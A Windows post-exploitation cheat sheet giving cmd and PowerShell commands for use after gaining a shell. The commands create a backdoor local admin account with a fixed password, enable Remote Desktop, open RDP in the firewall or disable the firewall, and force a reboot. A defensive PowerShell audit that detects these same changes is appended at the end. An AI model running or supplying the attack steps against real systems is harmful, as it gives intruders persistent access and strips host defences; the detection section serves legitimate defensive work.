Post Exploitation
Must DO Steps after getting shell in windows machine
1. Add a new user
net user AdminTest password@123 /add
2. Add a user to Administrator Group
net localgroup Administrators AdminTest /add
3. Enable Remote Desktop
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
This sets 'fDenyTSConnections' to '0', which enables Remote Desktop (the value is 0, not a '/0' switch).
4. Turn Off Windows Firewall
netsh advfirewall set allprofiles state off
5. Restart
shutdown /r /t 0 /f
PowerShell Alternative
1. Add a user "AdminTest"
New-LocalUser -Name "AdminTest" -Password (ConvertTo-SecureString "password@123" -AsPlainText -Force) -FullName "Admin Test User" -Description "Admin Test Account"
2. Add a user to Administrator Group
Add-LocalGroupMember -Group "Administrators" -Member "AdminTest"
3. Enable Remote Desktop
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0
This sets 'fDenyTSConnections' to '0', which enables Remote Desktop (note the 'HKLM:' PowerShell drive prefix in the path).
4. Allow RDP through Firewall
Enable-NetFirewallRule -Group "Remote Desktop"
5. Turn Off Windows Firewall
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
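For the defender side, the same five changes leave a small, fixed set of host artifacts. The following PowerShell audit is an added example, not part of the original cheat sheet; it assumes PowerShell 5.1 or later on Windows 10 / Server 2016+, the built-in LocalAccounts and NetSecurity modules, and an approved-administrators baseline ($Baseline) that you supply.

```powershell
# Added example: audit a host for the changes made by the steps above.
# $Baseline is a constructed, assumed list of approved local Administrators members.
$Baseline = @('Administrator')
$findings = @()

# Steps 1-2: unexpected members of the local Administrators group.
$members = Get-LocalGroupMember -Group 'Administrators' |
    ForEach-Object { $_.Name.Split('\')[-1] }
foreach ($m in $members) {
    if ($Baseline -notcontains $m) {
        $findings += "Unexpected member of Administrators: $m"
    }
}

# Steps 1-2 (event trail): Security log 4720 = local user created,
# 4732 = member added to a security-enabled local group, last 24 hours.
$since = (Get-Date).AddHours(-24)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $findings += "Event $($_.Id) at $($_.TimeCreated): $($_.Message.Split("`n")[0])"
    }

# Step 3: fDenyTSConnections = 0 means Remote Desktop is enabled.
$rdp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections
if ($rdp.fDenyTSConnections -eq 0) {
    $findings += 'Remote Desktop is enabled (fDenyTSConnections = 0)'
}

# Steps 4-5: firewall profiles switched off, or the RDP rule group enabled.
Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } |
    ForEach-Object { $findings += "Firewall profile disabled: $($_.Name)" }
Get-NetFirewallRule -Group 'Remote Desktop' -ErrorAction SilentlyContinue |
    Where-Object { $_.Enabled -eq 'True' } |
    ForEach-Object { $findings += "RDP firewall rule enabled: $($_.DisplayName)" }

if ($findings.Count -eq 0) { 'No findings' } else { $findings }
```

Run it elevated so the Security log is readable; compare the Administrators output against your own baseline rather than the constructed one above.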